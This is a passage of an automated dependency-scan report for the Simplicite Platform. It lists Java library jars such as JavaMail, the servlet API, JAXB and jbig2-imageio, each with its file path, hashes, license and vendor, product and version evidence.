Evidence Type Source Name Value Confidence Vendor file name javax.inject-1 High Vendor jar package name inject Highest Vendor jar package name inject Low Vendor jar package name javax Highest Vendor jar package name javax Low Vendor pom artifactid javax.inject Highest Vendor pom artifactid javax.inject Low Vendor pom groupid javax.inject Highest Vendor pom name javax.inject High Vendor pom url http://code.google.com/p/atinject/ Highest Product file name javax.inject-1 High Product jar package name inject Highest Product jar package name inject Low Product jar package name javax Highest Product pom artifactid javax.inject Highest Product pom groupid javax.inject Highest Product pom name javax.inject High Product pom url http://code.google.com/p/atinject/ Medium Version file version 1 Medium Version pom version 1 Highest
javax.jms-api-2.0.1.jarDescription:
Java(TM) Message Service Specification License:
CDDL + GPLv2 with classpath exception: https://glassfish.java.net/nonav/public/CDDL+GPL_1_1.html File Path: /var/simplicite/.m2/repository/javax/jms/javax.jms-api/2.0.1/javax.jms-api-2.0.1.jar
MD5: d69d2e02910e97b2478c0105e9b2caab
SHA1: 5faaa3864ff6025ce69809b60d65bda3e358610c
SHA256: aa4a16fac46d949b17b32091036e4d1e3c812ef3b4bd184ec838efffb53ba4f8
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name javax.jms-api High Vendor jar package name javax Highest Vendor jar package name jms Highest Vendor Manifest bundle-symbolicname javax.jms-api Medium Vendor Manifest extension-name javax.jms Medium Vendor Manifest Implementation-Vendor-Id org.glassfish.mq Medium Vendor Manifest specification-vendor Oracle Corporation Low Vendor pom artifactid javax.jms-api Highest Vendor pom artifactid javax.jms-api Low Vendor pom developer org Oracle Corporation Medium Vendor pom groupid javax.jms Highest Vendor pom name JMS API High Vendor pom parent-artifactid jvnet-parent Low Vendor pom parent-groupid net.java Medium Vendor pom url http://java.net/projects/jms-spec/pages/Home Highest Product file name javax.jms-api High Product jar package name javax Highest Product jar package name jms Highest Product jar package name message Highest Product Manifest Bundle-Name JMS API Medium Product Manifest bundle-symbolicname javax.jms-api Medium Product Manifest extension-name javax.jms Medium Product pom artifactid javax.jms-api Highest Product pom developer org Oracle Corporation Low Product pom groupid javax.jms Highest Product pom name JMS API High Product pom parent-artifactid jvnet-parent Medium Product pom parent-groupid net.java Medium Product pom url http://java.net/projects/jms-spec/pages/Home Medium Version file version 2.0.1 High Version Manifest Bundle-Version 2.0.1 High Version Manifest Implementation-Version 2.0.1 High Version pom parent-version 2.0.1 Low Version pom version 2.0.1 Highest
javax.mail-1.6.2.jarDescription:
JavaMail API License:
https://javaee.github.io/javamail/LICENSE File Path: /var/simplicite/.m2/repository/com/sun/mail/javax.mail/1.6.2/javax.mail-1.6.2.jar
MD5: 0b81d022797740d72d21620781841374
SHA1: 935151eb71beff17a2ffac15dd80184a99a0514f
SHA256: 45b515e7104944c09e45b9c7bb1ce5dff640486374852dd2b2e80cc3752dfa11
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name javax.mail High Vendor jar package name javax Highest Vendor jar package name mail Highest Vendor jar package name provider Highest Vendor jar package name sun Highest Vendor jar (hint) package name oracle Highest Vendor Manifest automatic-module-name java.mail Medium Vendor Manifest bundle-docurl http://www.oracle.com Low Vendor Manifest bundle-symbolicname com.sun.mail.javax.mail Medium Vendor Manifest extension-name javax.mail Medium Vendor Manifest Implementation-Vendor Oracle High Vendor Manifest Implementation-Vendor-Id com.sun Medium Vendor Manifest probe-provider-xml-file-names META-INF/gfprobe-provider.xml Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Vendor Manifest specification-vendor Oracle Low Vendor Manifest (hint) Implementation-Vendor sun High Vendor Manifest (hint) specification-vendor sun Low Vendor pom artifactid javax.mail Highest Vendor pom artifactid javax.mail Low Vendor pom groupid com.sun.mail Highest Vendor pom name JavaMail API High Vendor pom parent-artifactid all Low Product file name javax.mail High Product jar package name javax Highest Product jar package name mail Highest Product jar package name provider Highest Product jar package name sun Highest Product jar package name version Highest Product Manifest automatic-module-name java.mail Medium Product Manifest bundle-docurl http://www.oracle.com Low Product Manifest Bundle-Name JavaMail API Medium Product Manifest bundle-symbolicname com.sun.mail.javax.mail Medium Product Manifest extension-name javax.mail Medium Product Manifest Implementation-Title javax.mail High Product Manifest probe-provider-xml-file-names META-INF/gfprobe-provider.xml Medium Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Product Manifest specification-title JavaMail(TM) API Design Specification Medium Product pom artifactid javax.mail Highest Product pom groupid com.sun.mail Highest Product pom name JavaMail API High Product pom parent-artifactid all Medium Version file version 1.6.2 High Version Manifest Bundle-Version 1.6.2 High Version Manifest Implementation-Version 1.6.2 High Version pom version 1.6.2 Highest
javax.servlet-api-4.0.1.jarDescription:
Java(TM) Servlet 4.0 API Design Specification License:
CDDL + GPLv2 with classpath exception: https://oss.oracle.com/licenses/CDDL+GPL-1.1 File Path: /var/simplicite/.m2/repository/javax/servlet/javax.servlet-api/4.0.1/javax.servlet-api-4.0.1.jar
MD5: b80414033bf3397de334b95e892a2f44
SHA1: a27082684a2ff0bf397666c3943496c44541d1ca
SHA256: 83a03dd877d3674576f0da7b90755c8524af099ccf0607fc61aa971535ad7c60
Referenced In Project/Scope: Simplicite Platform:provided
Evidence Type Source Name Value Confidence Vendor file name javax.servlet-api High Vendor jar package name javax Highest Vendor jar package name servlet Highest Vendor Manifest bundle-docurl https://javaee.github.io Low Vendor Manifest bundle-symbolicname javax.servlet-api Medium Vendor Manifest extension-name javax.servlet Medium Vendor Manifest Implementation-Vendor GlassFish Community High Vendor Manifest Implementation-Vendor-Id org.glassfish Medium Vendor Manifest specification-vendor Oracle Corporation Low Vendor pom artifactid javax.servlet-api Highest Vendor pom artifactid javax.servlet-api Low Vendor pom developer id edburns Medium Vendor pom developer id shingwaichan Medium Vendor pom developer name Ed Burns Medium Vendor pom developer name Shing Wai Chan Medium Vendor pom developer org Oracle Medium Vendor pom groupid javax.servlet Highest Vendor pom name Java Servlet API High Vendor pom organization name GlassFish Community High Vendor pom organization url https://javaee.github.io Medium Vendor pom parent-artifactid jvnet-parent Low Vendor pom parent-groupid net.java Medium Vendor pom url https://javaee.github.io/servlet-spec/ Highest Vendor pom (hint) developer org sun Medium Product file name javax.servlet-api High Product jar package name javax Highest Product jar package name servlet Highest Product Manifest bundle-docurl https://javaee.github.io Low Product Manifest Bundle-Name Java Servlet API Medium Product Manifest bundle-symbolicname javax.servlet-api Medium Product Manifest extension-name javax.servlet Medium Product pom artifactid javax.servlet-api Highest Product pom developer id edburns Low Product pom developer id shingwaichan Low Product pom developer name Ed Burns Low Product pom developer name Shing Wai Chan Low Product pom developer org Oracle Low Product pom groupid javax.servlet Highest Product pom name Java Servlet API High Product pom organization name GlassFish Community Low Product pom organization url https://javaee.github.io Low Product pom parent-artifactid jvnet-parent Medium Product pom parent-groupid net.java Medium Product pom url https://javaee.github.io/servlet-spec/ Medium Version file version 4.0.1 High Version Manifest Implementation-Version 4.0.1 High Version pom parent-version 4.0.1 Low Version pom version 4.0.1 Highest
javax.servlet.jsp-api-2.3.3.jarDescription:
Java.net - The Source for Java Technology Collaboration License:
CDDL + GPLv2 with classpath exception: ://oss.oracle.com/licenses/CDDL+GPL-1.1 File Path: /var/simplicite/.m2/repository/javax/servlet/jsp/javax.servlet.jsp-api/2.3.3/javax.servlet.jsp-api-2.3.3.jar
MD5: f6676a5961328c41c5e722da5e48d047
SHA1: 81191ab80e342912dc9cea735c30ff4eddc64de3
SHA256: 409a534d275ef0958a2c1692472da30e3706bfe6933d56c039376f53f13689b7
Referenced In Project/Scope: Simplicite Platform:provided
Evidence Type Source Name Value Confidence Vendor file name javax.servlet.jsp-api High Vendor jar package name javax Highest Vendor jar package name jsp Highest Vendor jar package name servlet Highest Vendor Manifest bundle-docurl http://www.oracle.com Low Vendor Manifest bundle-symbolicname javax.servlet.jsp-api Medium Vendor Manifest extension-name javax.servlet.jsp Medium Vendor Manifest Implementation-Vendor Oracle Corporation High Vendor Manifest specification-vendor Oracle Corporation Low Vendor pom artifactid javax.servlet.jsp-api Highest Vendor pom artifactid javax.servlet.jsp-api Low Vendor pom developer id kchung Medium Vendor pom developer name Kin-man Chung Medium Vendor pom developer org Oracle Corporation Medium Vendor pom groupid javax.servlet.jsp Highest Vendor pom name JavaServer Pages(TM) API High Vendor pom organization name Oracle High Vendor pom organization url http://www.oracle.com Medium Vendor pom parent-artifactid jvnet-parent Low Vendor pom parent-groupid net.java Medium Vendor pom url https://javaee.github.io/javaee-jsp-api Highest Vendor pom (hint) organization name sun High Product file name javax.servlet.jsp-api High Product jar package name javax Highest Product jar package name jsp Highest Product jar package name servlet Highest Product Manifest bundle-docurl http://www.oracle.com Low Product Manifest Bundle-Name JavaServer Pages(TM) API Medium Product Manifest bundle-symbolicname javax.servlet.jsp-api Medium Product Manifest extension-name javax.servlet.jsp Medium Product pom artifactid javax.servlet.jsp-api Highest Product pom developer id kchung Low Product pom developer name Kin-man Chung Low Product pom developer org Oracle Corporation Low Product pom groupid javax.servlet.jsp Highest Product pom name JavaServer Pages(TM) API High Product pom organization name Oracle Low Product pom organization url http://www.oracle.com Low Product pom parent-artifactid jvnet-parent Medium Product pom parent-groupid net.java Medium Product pom url https://javaee.github.io/javaee-jsp-api Medium Version file version 2.3.3 High Version Manifest Bundle-Version 2.3.3 High Version Manifest Implementation-Version 2.3.3 High Version pom parent-version 2.3.3 Low Version pom version 2.3.3 Highest
javax.transaction-api-1.3.jarDescription:
Project GlassFish Java Transaction API License:
CDDL + GPLv2 with classpath exception: https://github.com/javaee/javax.transaction/blob/master/LICENSE File Path: /var/simplicite/.m2/repository/javax/transaction/javax.transaction-api/1.3/javax.transaction-api-1.3.jar
MD5: 6e9cb1684621821248b6823143ae26c0
SHA1: e006adf5cf3cca2181d16bd640ecb80148ec0fce
SHA256: 603df5e4fc1eeae8f5e5d363a8be6c1fa47d0df1df8739a05cbcb9fafd6df2da
Referenced In Project/Scope: Simplicite Platform:provided
Evidence Type Source Name Value Confidence Vendor file name javax.transaction-api High Vendor jar package name javax Highest Vendor jar package name transaction Highest Vendor Manifest automatic-module-name java.transaction Medium Vendor Manifest bundle-docurl https://glassfish.java.net Low Vendor Manifest bundle-symbolicname javax.transaction-api Medium Vendor Manifest extension-name javax.transaction Medium Vendor Manifest Implementation-Vendor GlassFish Community High Vendor Manifest Implementation-Vendor-Id org.glassfish Medium Vendor Manifest specification-vendor Oracle Corporation Low Vendor pom artifactid javax.transaction-api Highest Vendor pom artifactid javax.transaction-api Low Vendor pom developer id stephen_felts Medium Vendor pom developer name Stephen Felts Medium Vendor pom developer org Oracle, Inc. Medium Vendor pom groupid javax.transaction Highest Vendor pom name ${extension.name} API High Vendor pom organization name GlassFish Community High Vendor pom organization url https://glassfish.java.net Medium Vendor pom parent-artifactid jvnet-parent Low Vendor pom parent-groupid net.java Medium Vendor pom url http://jta-spec.java.net Highest Product file name javax.transaction-api High Product jar package name javax Highest Product jar package name transaction Highest Product Manifest automatic-module-name java.transaction Medium Product Manifest bundle-docurl https://glassfish.java.net Low Product Manifest Bundle-Name javax.transaction API Medium Product Manifest bundle-symbolicname javax.transaction-api Medium Product Manifest extension-name javax.transaction Medium Product pom artifactid javax.transaction-api Highest Product pom developer id stephen_felts Low Product pom developer name Stephen Felts Low Product pom developer org Oracle, Inc. Low Product pom groupid javax.transaction Highest Product pom name ${extension.name} API High Product pom organization name GlassFish Community Low Product pom organization url https://glassfish.java.net Low Product pom parent-artifactid jvnet-parent Medium Product pom parent-groupid net.java Medium Product pom url http://jta-spec.java.net Medium Version file version 1.3 High Version Manifest Bundle-Version 1.3 High Version Manifest Implementation-Version 1.3 High Version pom parent-version 1.3 Low Version pom version 1.3 Highest
javax.websocket-api-1.1.jarDescription:
JSR 356: Java API for WebSocket License:
https://glassfish.java.net/public/CDDL+GPL_1_1.html File Path: /var/simplicite/.m2/repository/javax/websocket/javax.websocket-api/1.1/javax.websocket-api-1.1.jar
MD5: be29e11a4a15742aa6fb418fa46345e3
SHA1: eeeb68631711256418dfbb47b11c731b6c8f6235
SHA256: a260973517bf6411d659b588a719aa27e7e4e47dfbd510fceb5bf1023a2c45e4
Referenced In Project/Scope: Simplicite Platform:provided
Evidence Type Source Name Value Confidence Vendor file name javax.websocket-api High Vendor jar package name javax Highest Vendor jar package name server Highest Vendor jar package name websocket Highest Vendor Manifest bundle-docurl http://www.oracle.com Low Vendor Manifest bundle-symbolicname javax.websocket-api Medium Vendor Manifest extension-name javax.websocket Medium Vendor pom artifactid javax.websocket-api Highest Vendor pom artifactid javax.websocket-api Low Vendor pom groupid javax.websocket Highest Vendor pom name WebSocket server API High Vendor pom parent-artifactid javax.websocket-all Low Vendor pom url http://websocket-spec.java.net Highest Product file name javax.websocket-api High Product jar package name javax Highest Product jar package name server Highest Product jar package name websocket Highest Product Manifest bundle-docurl http://www.oracle.com Low Product Manifest Bundle-Name WebSocket server API Medium Product Manifest bundle-symbolicname javax.websocket-api Medium Product Manifest extension-name javax.websocket Medium Product pom artifactid javax.websocket-api Highest Product pom groupid javax.websocket Highest Product pom name WebSocket server API High Product pom parent-artifactid javax.websocket-all Medium Product pom url http://websocket-spec.java.net Medium Version file version 1.1 High Version Manifest Bundle-Version 1.1 High Version Manifest Implementation-Version 1.1 High Version pom version 1.1 Highest
javax.ws.rs-api-2.0.1.jarDescription:
Java API for RESTful Web Services (JAX-RS) License:
CDDL 1.1: http://glassfish.java.net/public/CDDL+GPL_1_1.html
GPL2 w/ CPE: http://glassfish.java.net/public/CDDL+GPL_1_1.html File Path: /var/simplicite/.m2/repository/javax/ws/rs/javax.ws.rs-api/2.0.1/javax.ws.rs-api-2.0.1.jar
MD5: edcd111cf4d3ba8ac8e1f326efc37a17
SHA1: 104e9c2b5583cfcfeac0402316221648d6d8ea6b
SHA256: 38607d626f2288d8fbc1b1f8a62c369e63806d9a313ac7cbc5f9d6c94f4b466d
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name javax.ws.rs-api High Vendor hint analyzer vendor web services Medium Vendor jar package name javax Highest Vendor jar package name rs Highest Vendor jar package name ws Highest Vendor Manifest bundle-docurl http://www.oracle.com/ Low Vendor Manifest bundle-symbolicname javax.ws.rs-api Medium Vendor Manifest extension-name javax.ws.rs Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" Low Vendor Manifest specification-vendor Oracle Corporation Low Vendor pom artifactid javax.ws.rs-api Highest Vendor pom artifactid javax.ws.rs-api Low Vendor pom developer email m_potociar@java.net Low Vendor pom developer email spericas@java.net Low Vendor pom developer id Marek Medium Vendor pom developer id Santiago Medium Vendor pom developer name Marek Potociar Medium Vendor pom developer name Santiago Pericas-Geertsen Medium Vendor pom developer org Oracle Medium Vendor pom developer org URL http://jax-rs-spec.java.net Medium Vendor pom groupid javax.ws.rs Highest Vendor pom name javax.ws.rs-api High Vendor pom organization name Oracle Corporation High Vendor pom organization url http://www.oracle.com/ Medium Vendor pom parent-artifactid jvnet-parent Low Vendor pom parent-groupid net.java Medium Vendor pom url http://jax-rs-spec.java.net Highest Vendor pom (hint) developer org sun Medium Product file name javax.ws.rs-api High Product hint analyzer product web services Medium Product jar package name javax Highest Product jar package name rs Highest Product jar package name ws Highest Product Manifest bundle-docurl http://www.oracle.com/ Low Product Manifest Bundle-Name javax.ws.rs-api Medium Product Manifest bundle-symbolicname javax.ws.rs-api Medium Product Manifest extension-name javax.ws.rs Medium Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" Low Product pom artifactid javax.ws.rs-api Highest Product pom developer email m_potociar@java.net Low Product pom developer email spericas@java.net Low Product pom developer id Marek Low Product pom developer id Santiago Low Product pom developer name Marek Potociar Low Product pom developer name Santiago Pericas-Geertsen Low Product pom developer org Oracle Low Product pom developer org URL http://jax-rs-spec.java.net Low Product pom groupid javax.ws.rs Highest Product pom name javax.ws.rs-api High Product pom organization name Oracle Corporation Low Product pom organization url http://www.oracle.com/ Low Product pom parent-artifactid jvnet-parent Medium Product pom parent-groupid net.java Medium Product pom url http://jax-rs-spec.java.net Medium Version file version 2.0.1 High Version Manifest Bundle-Version 2.0.1 High Version Manifest Implementation-Version 2.0.1 High Version pom parent-version 2.0.1 Low Version pom version 2.0.1 Highest
jawk-1.02.jarDescription:
POM was created from install:install-file File Path: /var/simplicite/.m2/repository/org/jawk/jawk/1.02/jawk-1.02.jarMD5: cd04ea3460d71a03ca5f4232c9ee5f0cSHA1: 7bdd8bb1a1b9adff9b471cc041cba83ef3a2abe6SHA256: 2773c7f47b2ee8f483d6cb30f799c31f81645d23f49910e58ef4cccb2ffe1c7bReferenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name jawk High Vendor jar package name jawk Highest Vendor jar package name jawk Low Vendor pom artifactid jawk Highest Vendor pom artifactid jawk Low Vendor pom groupid org.jawk Highest Product file name jawk High Product jar package name jawk Highest Product pom artifactid jawk Highest Product pom groupid org.jawk Highest Version file version 1.02 High Version pom version 1.02 Highest
jaxb-api-2.3.1.jarDescription:
JAXB (JSR 222) API License:
https://oss.oracle.com/licenses/CDDL+GPL-1.1, https://oss.oracle.com/licenses/CDDL+GPL-1.1 File Path: /var/simplicite/.m2/repository/javax/xml/bind/jaxb-api/2.3.1/jaxb-api-2.3.1.jar
MD5: bcf270d320f645ad19f5edb60091e87f
SHA1: 8531ad5ac454cc2deb9d4d32c40c4d7451939b5d
SHA256: 88b955a0df57880a26a74708bc34f74dcaf8ebf4e78843a28b50eae945732b06
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name jaxb-api High Vendor jar package name bind Highest Vendor jar package name javax Highest Vendor jar package name jaxb Highest Vendor jar package name xml Highest Vendor Manifest bundle-docurl http://www.oracle.com/ Low Vendor Manifest bundle-symbolicname jaxb-api Medium Vendor Manifest extension-name javax.xml.bind Medium Vendor Manifest implementation-build-id UNKNOWN-7de2ca118a0cfc4a373872915aef59148dff5f93, 2018-09-12T06:28:43-0700 Low Vendor Manifest Implementation-Vendor Oracle Corporation High Vendor Manifest Implementation-Vendor-Id org.glassfish Medium Vendor Manifest multi-release true Low Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version>=1.8))" Low Vendor Manifest specification-vendor Oracle Corporation Low Vendor pom artifactid jaxb-api Highest Vendor pom artifactid jaxb-api Low Vendor pom groupid javax.xml.bind Highest Vendor pom parent-artifactid jaxb-api-parent Low Product file name jaxb-api High Product jar package name bind Highest Product jar package name javax Highest Product jar package name jaxb Highest Product jar package name xml Highest Product Manifest bundle-docurl http://www.oracle.com/ Low Product Manifest Bundle-Name jaxb-api Medium Product Manifest bundle-symbolicname jaxb-api Medium Product Manifest extension-name javax.xml.bind Medium Product Manifest implementation-build-id UNKNOWN-7de2ca118a0cfc4a373872915aef59148dff5f93, 2018-09-12T06:28:43-0700 Low Product Manifest multi-release true Low Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version>=1.8))" Low Product Manifest specification-title jaxb-api Medium Product pom artifactid jaxb-api Highest Product pom groupid javax.xml.bind Highest Product pom parent-artifactid jaxb-api-parent Medium Version file version 2.3.1 High Version Manifest Bundle-Version 2.3.1 High Version pom version 2.3.1 Highest
jaxb-runtime-2.3.2.jarDescription:
JAXB (JSR 222) Reference Implementation File Path: /var/simplicite/.m2/repository/org/glassfish/jaxb/jaxb-runtime/2.3.2/jaxb-runtime-2.3.2.jarMD5: 9c3bf13a58e56c1b955bf5a365ca10b2SHA1: 5528bc882ea499a09d720b42af11785c4fc6be2aSHA256: e6e0a1e89fb6ff786279e6a0082d5cef52dc2ebe67053d041800737652b4fd1bReferenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name jaxb-runtime High Vendor jar package name bind Highest Vendor jar package name sun Highest Vendor jar package name xml Highest Vendor jar (hint) package name oracle Highest Vendor Manifest git-revision ae93d95 Low Vendor Manifest Implementation-Vendor Oracle High Vendor Manifest Implementation-Vendor-Id com.oracle Medium Vendor Manifest (hint) Implementation-Vendor sun High Vendor pom artifactid jaxb-runtime Highest Vendor pom artifactid jaxb-runtime Low Vendor pom groupid org.glassfish.jaxb Highest Vendor pom name JAXB Runtime High Vendor pom parent-artifactid jaxb-runtime-parent Low Vendor pom parent-groupid com.sun.xml.bind.mvn Medium Product file name jaxb-runtime High Product jar package name bind Highest Product jar package name sun Highest Product jar package name xml Highest Product Manifest git-revision ae93d95 Low Product Manifest Implementation-Title JAXB Implementation High Product Manifest specification-title Java Architecture for XML Binding Medium Product pom artifactid jaxb-runtime Highest Product pom groupid org.glassfish.jaxb Highest Product pom name JAXB Runtime High Product pom parent-artifactid jaxb-runtime-parent Medium Product pom parent-groupid com.sun.xml.bind.mvn Medium Version file version 2.3.2 High Version Manifest build-id 2.3.2 Medium Version Manifest Implementation-Version 2.3.2 High Version Manifest major-version 2.3.2 Medium Version pom version 2.3.2 Highest
jaxb-svg11-1.0.2.jarDescription:
JAXB classes modelling SVG 1.1 License:
Apache 2: http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/org/plutext/jaxb-svg11/1.0.2/jaxb-svg11-1.0.2.jar
MD5: 91f22bed36295692c384e846dfc460b0
SHA1: 3c0cd54d5691f5b5f8c60ed0c06353ff1db424e1
SHA256: 6799f39d49d9dbfef140e76b33d0884d55372935768a3955900eb022576a760d
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name jaxb-svg11 High Vendor jar package name jaxb Highest Vendor jar package name jaxb Low Vendor jar package name plutext Highest Vendor jar package name plutext Low Vendor jar package name svg Highest Vendor jar package name svg11 Highest Vendor jar package name svg11 Low Vendor pom artifactid jaxb-svg11 Highest Vendor pom artifactid jaxb-svg11 Low Vendor pom developer email jason@plutext.org Low Vendor pom developer id jharrop Medium Vendor pom developer name Jason Harrop Medium Vendor pom developer org Plutext Medium Vendor pom groupid org.plutext Highest Vendor pom name jaxb-svg11 High Vendor pom url plutext/JAXB-classes-for-SVG Highest Product file name jaxb-svg11 High Product jar package name jaxb Highest Product jar package name jaxb Low Product jar package name plutext Highest Product jar package name svg Highest Product jar package name svg11 Highest Product jar package name svg11 Low Product pom artifactid jaxb-svg11 Highest Product pom developer email jason@plutext.org Low Product pom developer id jharrop Low Product pom developer name Jason Harrop Low Product pom developer org Plutext Low Product pom groupid org.plutext Highest Product pom name jaxb-svg11 High Product pom url plutext/JAXB-classes-for-SVG High Version file version 1.0.2 High Version pom version 1.0.2 Highest
jaxb-xjc-2.3.2.jarDescription:
JAXB Binding Compiler. Contains source code needed for binding customization files into java sources.
In other words: the *tool* to generate java classes for the given xml representation.
File Path: /var/simplicite/.m2/repository/org/glassfish/jaxb/jaxb-xjc/2.3.2/jaxb-xjc-2.3.2.jarMD5: 1c78df3990145ef0acfeb83c1d2ae567SHA1: 9cfd86529359747d07251c017d4e46254faa2c2bSHA256: b68ad7eeb5c0b514114897c37ff7efb8885419d03fd6e8e5fae2d4ce76f51d89Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name jaxb-xjc High Vendor jar package name com Highest Vendor jar package name sun Highest Vendor jar package name xjc Highest Vendor jar (hint) package name oracle Highest Vendor Manifest git-revision ae93d95 Low Vendor Manifest Implementation-Vendor Oracle High Vendor Manifest Implementation-Vendor-Id com.oracle Medium Vendor Manifest multi-release true Low Vendor Manifest (hint) Implementation-Vendor sun High Vendor pom artifactid jaxb-xjc Highest Vendor pom artifactid jaxb-xjc Low Vendor pom groupid org.glassfish.jaxb Highest Vendor pom name JAXB XJC High Vendor pom parent-artifactid jaxb-parent Low Vendor pom parent-groupid com.sun.xml.bind.mvn Medium Product file name jaxb-xjc High Product jar package name com Highest Product jar package name sun Highest Product jar package name xjc Highest Product Manifest git-revision ae93d95 Low Product Manifest Implementation-Title JAXB Implementation High Product Manifest multi-release true Low Product Manifest specification-title Java Architecture for XML Binding Medium Product pom artifactid jaxb-xjc Highest Product pom groupid org.glassfish.jaxb Highest Product pom name JAXB XJC High Product pom parent-artifactid jaxb-parent Medium Product pom parent-groupid com.sun.xml.bind.mvn Medium Version file version 2.3.2 High Version Manifest build-id 2.3.2 Medium Version Manifest Implementation-Version 2.3.2 High Version Manifest major-version 2.3.2 Medium Version pom version 2.3.2 Highest
jbig2-imageio-3.0.2.jarDescription:
Java Image I/O plugin for reading JBIG2-compressed image data.
Formerly known as the levigo JBig2 ImageIO plugin (com.levigo.jbig2:levigo-jbig2-imageio).
File Path: /var/simplicite/.m2/repository/org/apache/pdfbox/jbig2-imageio/3.0.2/jbig2-imageio-3.0.2.jarMD5: 75dacf14cc468045f89d7f5fff1aa494SHA1: 46a53edceceabcdf9b81cd6d14f052bdfa171f4bSHA256: 3dc510cd41511f2e2382eb7ac3550b2f94e21847f0b7221be8ddd0f2252a8fe4Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name jbig2-imageio High Vendor jar package name apache Highest Vendor jar package name image Highest Vendor jar package name jbig2 Highest Vendor jar package name pdfbox Highest Vendor Manifest implementation-url https://www.apache.org/jbig2-imageio/ Low Vendor Manifest Implementation-Vendor The Apache Software Foundation High Vendor Manifest Implementation-Vendor-Id org.apache.pdfbox Medium Vendor Manifest specification-vendor The Apache Software Foundation Low Vendor pom artifactid jbig2-imageio Highest Vendor pom artifactid jbig2-imageio Low Vendor pom developer id adam Medium Vendor pom developer id blitchfield Medium Vendor pom developer id carrier Medium Vendor pom developer id danielwilson Medium Vendor pom developer id gbailleul Medium Vendor pom developer id hennejg Medium Vendor pom developer id holdersn Medium Vendor pom developer id jahewson Medium Vendor pom developer id jeremias Medium Vendor pom developer id jukka Medium Vendor pom developer id kjackson Medium Vendor pom developer id koch Medium Vendor pom developer id koehlecn Medium Vendor pom developer id lehmi Medium Vendor pom developer id leleueri Medium Vendor pom developer id mmayer Medium Vendor pom developer id msayhoun Medium Vendor pom developer id pkoch Medium Vendor pom developer id tallison Medium Vendor pom developer id tboehme Medium Vendor pom developer id tchojecki Medium Vendor pom developer id tilman Medium Vendor pom developer id vfed Medium Vendor pom developer name Adam Nichols Medium Vendor pom developer name Andreas Lehmkühler Medium Vendor pom developer name Ben Litchfield Medium Vendor pom developer name Brian Carrier Medium Vendor pom developer name Carolin Köhler Medium Vendor pom developer name Daniel Wilson Medium Vendor pom developer name Eric Leleu Medium Vendor pom developer name Guillaume Bailleul Medium Vendor pom developer name Jeremias Maerki Medium Vendor pom developer name Johannes Koch Medium Vendor pom developer name John Hewson Medium Vendor pom developer name Jukka Zitting Medium Vendor pom developer name Jörg Henne Medium Vendor pom developer name Kevin Jackson Medium Vendor pom developer name Maruan Sayhoun Medium Vendor pom developer name Matthäus Mayer Medium Vendor pom developer name Phillipp Koch Medium Vendor pom developer name Sebastian Holder Medium Vendor pom developer name Thomas Chojecki Medium Vendor pom developer name Tilman Hausherr Medium Vendor pom developer name Tim Allison Medium Vendor pom developer name Timo Boehme Medium Vendor pom developer name Villu Ruusmann Medium Vendor pom groupid org.apache.pdfbox Highest Vendor pom name PDFBox JBIG2 ImageIO plugin High Vendor pom organization name The Apache Software Foundation High Vendor pom organization url http://pdfbox.apache.org Medium Vendor pom parent-artifactid apache Low Vendor pom parent-groupid org.apache Medium Product file name jbig2-imageio High Product jar package name apache Highest Product jar package name image Highest Product jar package name jbig2 Highest Product jar package name pdfbox Highest Product Manifest Implementation-Title PDFBox JBIG2 ImageIO plugin High Product Manifest implementation-url https://www.apache.org/jbig2-imageio/ Low Product Manifest specification-title PDFBox JBIG2 ImageIO plugin Medium Product pom artifactid jbig2-imageio Highest Product pom developer id adam Low Product pom developer id blitchfield Low Product pom developer id carrier Low Product pom developer id danielwilson Low Product pom developer id gbailleul Low Product pom developer id hennejg Low Product pom developer id holdersn Low Product pom developer id jahewson Low Product pom developer id jeremias Low Product pom developer id jukka Low Product pom developer id kjackson Low Product pom developer id koch Low Product pom developer id koehlecn Low Product pom developer id lehmi Low Product pom developer id leleueri Low Product pom developer id mmayer Low Product pom developer id msayhoun Low Product pom developer id pkoch Low Product pom developer id tallison Low Product pom developer id tboehme Low Product pom developer id tchojecki Low Product pom developer id tilman Low Product pom developer id vfed Low Product pom developer name Adam Nichols Low Product pom developer name Andreas Lehmkühler Low Product pom developer name Ben Litchfield Low Product pom developer name Brian Carrier Low Product pom developer name Carolin Köhler Low Product pom developer name Daniel Wilson Low Product pom developer name Eric Leleu Low Product pom developer name Guillaume Bailleul Low Product pom developer name Jeremias Maerki Low Product pom developer name Johannes Koch Low Product pom developer name John Hewson Low Product pom developer name Jukka Zitting Low Product pom developer name Jörg Henne Low Product pom developer name Kevin Jackson Low Product pom developer name Maruan Sayhoun Low Product pom developer name Matthäus Mayer Low Product pom developer name Phillipp Koch Low Product pom developer name Sebastian Holder Low Product pom developer name Thomas Chojecki Low Product pom developer name Tilman Hausherr Low Product pom developer name Tim Allison Low Product pom developer name Timo Boehme Low Product pom developer name Villu Ruusmann Low Product pom groupid org.apache.pdfbox Highest Product pom name PDFBox JBIG2 ImageIO plugin High Product pom organization name The Apache Software Foundation Low Product pom organization url http://pdfbox.apache.org Low Product pom parent-artifactid apache Medium Product pom parent-groupid org.apache Medium Version file version 3.0.2 High Version Manifest Implementation-Version 3.0.2 High Version pom parent-version 3.0.2 Low Version pom version 3.0.2 Highest
